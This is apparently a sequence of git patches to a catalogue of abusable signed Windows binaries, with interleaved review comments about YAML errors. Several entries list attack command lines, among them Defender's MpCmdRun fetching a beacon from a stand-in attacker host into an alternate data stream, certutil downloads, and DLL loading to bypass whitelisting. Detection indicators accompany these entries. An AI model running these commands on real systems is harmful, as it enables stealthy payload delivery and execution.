+ OperatingSystem: Windows 10
 - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
 Description: Download file to machine and store it in Alternate Data Stream
 Usecase: Hide downloaded data inton an Alternate Data Stream
@@ -44,4 +52,6 @@ Acknowledgement:
 Handle: '@oddvarmoe'
 - Person: RichRumble
 Handle: ''
----
+ - Person: Cedric
+ Handle: '@th3c3dr1c'
+---
\ No newline at end of file
From a45d4ca25cf71578dab0ae9d5ccc827c30157f9f Mon Sep 17 00:00:00 2001
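Review bot: The second hunk replaces the closing `---` with one lacking a trailing newline (`\ No newline at end of file`), regressing the fix that several earlier commits in this series (Certreq, Vbc, Agentexecutor) made deliberately; the file should keep ending in a newline. The bypass command copies `...\Platform\4.18.2008.9-0\MpCmdRun.exe` and `chdir`s back into that directory, and per the commit message it only works because that older Platform build, which still accepts `-DownloadFile`, remains on disk; the Description should state that dependency, e.g. `requires an older Defender Platform build that still supports -DownloadFile to be present on disk`, rather than just `[updated version to bypass Windows 10 mitigation]`. The purpose of the `chdir` (presumably so the copied binary resolves its companion DLLs from the original directory) is not stated and deserves a clause as well.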
From: checkymander <26147220+checkymander@users.noreply.github.com>
Date: Thu, 1 Oct 2020 22:37:00 -0400
Subject: [PATCH 84/96] Create DefaultPack.yml Added DefaultPack.EXE LOLBin
---
 yml/OtherMSBinaries/DefaultPack.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OtherMSBinaries/DefaultPack.yml
diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml
new file mode 100644
index 0000000..acf7856
--- /dev/null
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -0,0 +1,26 @@
+---
+Name: DefaultPack.EXE
+Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
+Author: @checkymander
+Created: '2020-10-01'
+Commands:
+ - Command: DefaultPack.EXE /C:"process.exe args"
+ Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
+ Usecase: Can be used to execute stagers, binaries, and other malicious commands.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/techniques/T1218/
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Program Files (x86)\Microsoft\DefaultPack\
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: DefaultPack.EXE spawned an unknown process
+Resources:
+ - Link: https://twitter.com/checkymander/status/1311509470275604480.
+Acknowledgement:
+ - Person: checkymander
+ Handle: @checkymander
+---
From 22d9bbe92a6c6f4ed65890844120cdc69ea1e0fd Mon Sep 17 00:00:00 2001
From: Martin
Date: Fri, 9 Oct 2020 17:10:49 +0200
Subject: [PATCH 85/96] Initial commit of Coregen.yml
---
 yml/OtherMSBinaries/Coregen.yml | 52 +++++++++++++++++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Coregen.yml
diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml
new file mode 100644
index 0000000..2f29394
--- /dev/null
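Review bot: `Author: @checkymander` and `Handle: @checkymander` are unquoted; `@` is a reserved indicator in YAML and cannot start a plain scalar, so the file will fail to parse — they need `Author: '@checkymander'` and `Handle: '@checkymander'`, exactly the fix applied to Ttdinject, Diantz and Agentexecutor earlier in this series. The Full_Path entry `C:\Program Files (x86)\Microsoft\DefaultPack\` is a directory rather than the binary and should end in `DefaultPack.EXE`. The Resources link carries a trailing period (`...1311509470275604480.`) that becomes part of the URL when rendered.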
+++ b/yml/OtherMSBinaries/Coregen.yml 
@@ -0,0 +1,52 @@
+---
+Name: coregen.exe
+Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregin is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
+Author: Martin Sohn Christensen
+Created: 2020-10-09
+Commands:
+ - Command: coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name
+ Description: Loads the target .DLL in arbitrary path specified with /L.
+ Usecase: Execute DLL code
+ Category: Execute
+ Privileges: User
+ MitreID: T1055
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1055
+ OperatingSystem: Windows
+ - Command: coregen.exe dummy_assembly_name
+ Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
+ Usecase: Execute DLL code
+ Category: Execute
+ Privileges: User
+ MitreID: T1055
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1055
+ OperatingSystem: Windows
+ - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
+ Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
+ Usecase: Execute DLL code
+ Category: AWL Bypass
+ Privileges: User
+ MitreID: T1218
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
+ - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
+Code_Sample:
+ - Code:
+Detection:
+ - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
+ - IOC: coregen.exe loading .dll file not named coreclr.dll
+ - IOC: coregen.exe command line containing -L or -l
+ - IOC: coregen.exe command line containing unexpected/invald assembly name
+ - IOC: coregen.exe application crash by invalid assembly name
+Resources:
+ - Link: https://www.youtube.com/watch?v=75XImxOOInU
+ - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
+Acknowledgement:
+ - Person: Nicky Tyrer
+ Handle:
+ - Person: Evan Pena
+ Handle:
+ - Person: Casey Erikson
+ Handle:
+---
\ No newline at end of file
From 47c03c97b89376da0094c4c585aace0522e8a257 Mon Sep 17 00:00:00 2001
From: Martin
Date: Sat, 10 Oct 2020 19:54:50 +0000
Subject: [PATCH 86/96] Typo
---
 yml/OtherMSBinaries/Coregen.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml
index 2f29394..91324cb 100644
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
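Review bot: The first command is `coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name` — the misspelt name and doubled `.exe` make it unrunnable as written, and apart from that it duplicates the third command; it should read `coregen.exe /L C:\folder\evil.dll dummy_assembly_name` or be dropped, since the third command already documents `/L`. The Detection IOC `command line containing -L or -l` does not match the commands, which use `/L`; it should cover both switch prefixes or say `/L`. `Author: Martin Sohn Christensen` and `Created: 2020-10-09` are unquoted unlike the rest of the repository; quoting the date keeps it a string rather than a YAML timestamp. The first Acknowledgement, `Nicky Tyrer`, is probably `Nick Tyrer` (`@NickTyrer`) as credited in Xwizard.yml earlier in this series — worth confirming, and the three empty `Handle:` fields should be filled or set to `''` as the other entries do.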
@@ -1,6 +1,6 @@
 ---
 Name: coregen.exe
-Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregin is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
+Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
 Author: Martin Sohn Christensen
 Created: 2020-10-09
 Commands:
@@ -49,4 +49,4 @@ Acknowledgement:
 Handle:
 - Person: Casey Erikson
 Handle:
----
\ No newline at end of file
+---
From 651e156583ebe2edc1779aec0d8a3d960a8ea5a9 Mon Sep 17 00:00:00 2001
From: "@dtmsecurity"
Date: Mon, 12 Oct 2020 19:24:45 +0100
Subject: [PATCH 87/96] Create Wuauclt.yml
---
 yml/OSBinaries/Wuauclt.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OSBinaries/Wuauclt.yml
diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml
new file mode 100644
index 0000000..ba02158
--- /dev/null
+++ b/yml/OSBinaries/Wuauclt.yml
@@ -0,0 +1,26 @@
+---
+Name: wuauclt.exe
+Description: Windows Update Client
+Author: 'David Middlehurst'
+Created: '2020-09-23'
+Commands:
+ - Command: wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer
+ Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
+ Usecase: Execute dll via attach/detach methods
+ Category: Execute
+ Privileges: User
+ MitreID: T1085
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+ OperatingSystem: Windows 10
+Full_Path:
+ - Path: C:\Windows\System32\wuauclt.exe
+Code_Sample:
+- Code:
+Detection:
+ - IOC: wuauclt run with a parameter of a DLL path
+Resources:
+ - Link: https://dtm.uk/wuauclt/
+Acknowledgement:
+ - Person: David Middlehurst
+ Handle: '@dtmsecurity'
+---
From ab6d42ddcf44c24cc55d4ff16ced0d01ee8ffd23 Mon Sep 17 00:00:00 2001
From: leo1-1 <61551576+leo1-1@users.noreply.github.com>
Date: Wed, 14 Oct 2020 21:10:19 +0300
Subject: [PATCH 88/96] added command to certutil
---
 certutil.yml.txt | 76 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 76 insertions(+)
 create mode 100644 certutil.yml.txt
diff --git a/certutil.yml.txt b/certutil.yml.txt
new file mode 100644
index 0000000..b1aa789
--- /dev/null
+++ b/certutil.yml.txt
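Review bot: The Command value `wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer` never contains the `Full_Path_To_DLL` placeholder that its own Description and the Detection IOC ("a parameter of a DLL path") talk about, so the entry is internally inconsistent; either show the placeholder in the Command field or reword the Description so it explains the listed switches. `abosolute` in the Description is a typo for `absolute`. `- Code:` under Code_Sample is not indented like the other list items in this series (the Coregen and Certutil files use ` - Code:`), which YAML tolerates but which breaks the repository's layout convention. The MitreID/MitreLink pair points at T1085 while the other DLL-execution entries in this series (dotnet.exe, coregen.exe) use T1218; T1085 appears to have been retired into a T1218 sub-technique in the ATT&CK release current at this commit's date, so the pair is worth re-checking before merge.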
@@ -0,0 +1,76 @@
+---
+Name: Certutil.exe
+Description: Windows binary used for handeling certificates
+Author: 'Oddvar Moe'
+Created: '2018-05-25'
+Commands:
+ - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
+ Description: Download and save 7zip to disk in the current folder.
+ Usecase: Download file from Internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
+ Description: Download and save 7zip to disk in the current folder.
+ Usecase: Download file from Internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+ Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
+ Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
+ Category: ADS
+ Privileges: User
+ MitreID: T1096
+ MitreLink: https://attack.mitre.org/techniques/T1096
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil -encode inputFileName encodedOutputFileName
+ Description: Command to encode a file using Base64
+ Usecase: Encode files to evade defensive measures
+ Category: Encode
+ Privileges: User
+ MitreID: T1027
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1027
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil -decode encodedInputFileName decodedOutputFileName
+ Description: Command to decode a Base64 encoded file.
+ Usecase: Decode files to evade defensive measures
+ Category: Decode
+ Privileges: User
+ MitreID: T1140
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1140
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil --decodehex encoded_hexadecimal_InputFileName
+ Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+ Usecase: Decode files to evade defensive measures
+ Category: Decode
+ Privileges: User
+ MitreID: T1140
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1140
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+ - Path: C:\Windows\System32\certutil.exe
+ - Path: C:\Windows\SysWOW64\certutil.exe
+Code_Sample:
+ - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)
+Detection:
+ - IOC: Certutil.exe creating new files on disk
+ - IOC: Useragent Microsoft-CryptoAPI/10.0
+ - IOC: Useragent CertUtil URL Agent
+Resources:
+ - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
+ - Link: https://twitter.com/mattifestation/status/620107926288515072
+ - Link: https://twitter.com/egre55/status/1087685529016193025
+Acknowledgement:
+ - Person: Matt Graeber
+ Handle: '@mattifestation'
+ - Person: Moriarty
+ Handle: '@Moriarty_Meng'
+ - Person: egre55
+ Handle: '@egre55'
+ - Person: Lior Adar
+---
\ No newline at end of file
From 9a6309d8defe544b1cdd97c6d0d3b713b7c70ae4 Mon Sep 17 00:00:00 2001
From: Conor Richard
Date: Thu, 22 Oct 2020 20:38:50 -0400
Subject: [PATCH 89/96] Update ConfigSecurityPolicy.yml
Added link to Tweet from author containing an example usage.
---
 yml/OSBinaries/ConfigSecurityPolicy.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml
index 772dddb..0abab90 100644
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
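Review bot: `- Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)` has no space after the colon, so a YAML parser reads the whole item as one plain scalar rather than a `Code` key with a value, unlike every other `Key: value` item in this file; write it as `- Code: 546573745f62795f4c696f72` and move the parenthetical explanation into a comment or the Description. The new `--decodehex` entry's Description names `decodedOutputFileName`, but its Command lists only the input file, so the two disagree about the arguments; the neighbouring `-decode` entry, which shows both file names in the Command, is the pattern to follow. Every other certutil switch in this file is written with a single dash (`-encode`, `-decode`, `-urlcache`), so the double dash in `--decodehex` looks like a typo and should be confirmed. Both issues recur in the PATCH 94/96 hunk that copies this block into yml/OSBinaries/Certutil.yml. The file is also created as `certutil.yml.txt` at the repository root instead of under `yml/OSBinaries/`, where the existing Certutil.yml already lives, so it duplicates that entry rather than extending it.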
@@ -25,6 +25,7 @@ Resources:
 - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
 - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
 - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
+ - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
 Acknowledgement:
 - Person: Ialle Teixeira
 Handle: '@NtSetDefault'
From de169664d6da5a03cc055358a00360bb33f46bce Mon Sep 17 00:00:00 2001
From: xenoscr
Date: Thu, 22 Oct 2020 21:51:57 -0400
Subject: [PATCH 90/96] Finxing missing quotes
---
 yml/OtherMSBinaries/DefaultPack.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml
index acf7856..dbea4fd 100644
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@@ -1,7 +1,7 @@
 ---
 Name: DefaultPack.EXE
 Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
-Author: @checkymander
+Author: '@checkymander'
 Created: '2020-10-01'
 Commands:
 - Command: DefaultPack.EXE /C:"process.exe args"
@@ -22,5 +22,5 @@ Resources:
 - Link: https://twitter.com/checkymander/status/1311509470275604480.
 Acknowledgement:
 - Person: checkymander
- Handle: @checkymander
+ Handle: '@checkymander'
 ---
From 04c0e7ee38bb7f4780074007379b3b14427bdb02 Mon Sep 17 00:00:00 2001
From: Conor Richard
Date: Thu, 22 Oct 2020 22:00:05 -0400
Subject: [PATCH 91/96] Update Explorer.yml
Fixing alignment in Acknowledgement section
---
 yml/OSBinaries/Explorer.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
index 336f44b..5b65019 100644
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -34,6 +34,6 @@ Resources:
 Acknowledgement:
 - Person: Jai Minton
 Handle: '@CyberRaiju'
- - Person: Jimmy
+ - Person: Jimmy
 Handle: '@bohops'
 ---
From 9b60a844a2e55b797c03cd9af28dc65fb1140cae Mon Sep 17 00:00:00 2001
From: leo1-1 <61551576+leo1-1@users.noreply.github.com>
Date: Sun, 25 Oct 2020 09:03:39 +0200
Subject: [PATCH 92/96] Rename certutil.yml.txt to certutil.yml
changed
---
 certutil.yml.txt => certutil.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename certutil.yml.txt => certutil.yml (97%)
diff --git a/certutil.yml.txt b/certutil.yml
similarity index 97%
rename from certutil.yml.txt
rename to certutil.yml
index b1aa789..46408ae 100644
--- a/certutil.yml.txt
+++ b/certutil.yml
@@ -73,4 +73,4 @@ Acknowledgement:
 - Person: egre55
 Handle: '@egre55'
 - Person: Lior Adar
----
\ No newline at end of file
+---
From 2166960d4edcfdc3b8b9189fab1559f1f6bd6463 Mon Sep 17 00:00:00 2001
From: leo1-1 <61551576+leo1-1@users.noreply.github.com>
Date: Mon, 26 Oct 2020 08:22:58 +0200
Subject: [PATCH 93/96] changed path
---
 certutil.yml => yml/OSBinaries/certutil.yml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename certutil.yml => yml/OSBinaries/certutil.yml (100%)
diff --git a/certutil.yml b/yml/OSBinaries/certutil.yml
similarity index 100%
rename from certutil.yml
rename to yml/OSBinaries/certutil.yml
From 76d79ea4791709f52b1348e25c174571a4bd63c8 Mon Sep 17 00:00:00 2001
From: leo1-1 <61551576+leo1-1@users.noreply.github.com>
Date: Mon, 26 Oct 2020 08:57:42 +0200
Subject: [PATCH 94/96] Update Certutil
---
 yml/OSBinaries/Certutil.yml | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml
index db1e9a8..83afab2 100644
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@@ -44,11 +44,19 @@ Commands:
 MitreID: T1140
 MitreLink: https://attack.mitre.org/wiki/Technique/T1140
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ - Command: certutil --decodehex encoded_hexadecimal_InputFileName
+ Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+ Usecase: Decode files to evade defensive measures
+ Category: Decode
+ Privileges: User
+ MitreID: T1140
+ MitreLink: https://attack.mitre.org/wiki/Technique/T1140
+ OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\Windows\System32\certutil.exe
 - Path: C:\Windows\SysWOW64\certutil.exe
 Code_Sample:
- - Code:
+ - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)
 Detection:
 - IOC: Certutil.exe creating new files on disk
 - IOC: Useragent Microsoft-CryptoAPI/10.0
@@ -64,4 +72,5 @@ Acknowledgement:
 Handle: '@Moriarty_Meng'
 - Person: egre55
 Handle: '@egre55'
+ - Person: Lior Adar
 ---
From 64d5dffc4b337424d1c10bbce7c1d327253a508e Mon Sep 17 00:00:00 2001
From: leo1-1 <61551576+leo1-1@users.noreply.github.com>
Date: Mon, 26 Oct 2020 08:59:00 +0200
Subject: [PATCH 95/96] Delete certutil.yml
---
 yml/OSBinaries/certutil.yml | 76 ------------------------------------
 1 file changed, 76 deletions(-)
 delete mode 100644 yml/OSBinaries/certutil.yml
diff --git a/yml/OSBinaries/certutil.yml b/yml/OSBinaries/certutil.yml
deleted file mode 100644
index 46408ae..0000000
--- a/yml/OSBinaries/certutil.yml
+++ /dev/null
@@ -1,76 +0,0 @@
----
-Name: Certutil.exe
-Description: Windows binary used for handeling certificates
-Author: 'Oddvar Moe'
-Created: '2018-05-25'
-Commands:
- - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
- Description: Download and save 7zip to disk in the current folder.
- Usecase: Download file from Internet
- Category: Download
- Privileges: User
- MitreID: T1105
- MitreLink: https://attack.mitre.org/wiki/Technique/T1105
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
- Description: Download and save 7zip to disk in the current folder.
- Usecase: Download file from Internet
- Category: Download
- Privileges: User
- MitreID: T1105
- MitreLink: https://attack.mitre.org/wiki/Technique/T1105
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
- Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
- Category: ADS
- Privileges: User
- MitreID: T1096
- MitreLink: https://attack.mitre.org/techniques/T1096
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: certutil -encode inputFileName encodedOutputFileName
- Description: Command to encode a file using Base64
- Usecase: Encode files to evade defensive measures
- Category: Encode
- Privileges: User
- MitreID: T1027
- MitreLink: https://attack.mitre.org/wiki/Technique/T1027
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: certutil -decode encodedInputFileName decodedOutputFileName
- Description: Command to decode a Base64 encoded file.
- Usecase: Decode files to evade defensive measures
- Category: Decode
- Privileges: User
- MitreID: T1140
- MitreLink: https://attack.mitre.org/wiki/Technique/T1140
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- - Command: certutil --decodehex encoded_hexadecimal_InputFileName
- Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
- Usecase: Decode files to evade defensive measures
- Category: Decode
- Privileges: User
- MitreID: T1140
- MitreLink: https://attack.mitre.org/wiki/Technique/T1140
- OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-Full_Path:
- - Path: C:\Windows\System32\certutil.exe
- - Path: C:\Windows\SysWOW64\certutil.exe
-Code_Sample:
- - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)
-Detection:
- - IOC: Certutil.exe creating new files on disk
- - IOC: Useragent Microsoft-CryptoAPI/10.0
- - IOC: Useragent CertUtil URL Agent
-Resources:
- - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- - Link: https://twitter.com/mattifestation/status/620107926288515072
- - Link: https://twitter.com/egre55/status/1087685529016193025
-Acknowledgement:
- - Person: Matt Graeber
- Handle: '@mattifestation'
- - Person: Moriarty
- Handle: '@Moriarty_Meng'
- - Person: egre55
- Handle: '@egre55'
- - Person: Lior Adar
----
From 5806d33e7066cd1e73b32baee75d5fc5e1ee30ea Mon Sep 17 00:00:00 2001
From: Conor Richard
Date: Mon, 26 Oct 2020 19:43:55 -0400
Subject: [PATCH 96/96] Update Certutil.yml
---
 yml/OSBinaries/Certutil.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml
index 83afab2..c58c55d 100644
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@@ -56,7 +56,7 @@ Full_Path:
 - Path: C:\Windows\System32\certutil.exe
 - Path: C:\Windows\SysWOW64\certutil.exe
 Code_Sample:
- - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file)
+ - Code:
 Detection:
 - IOC: Certutil.exe creating new files on disk
 - IOC: Useragent Microsoft-CryptoAPI/10.0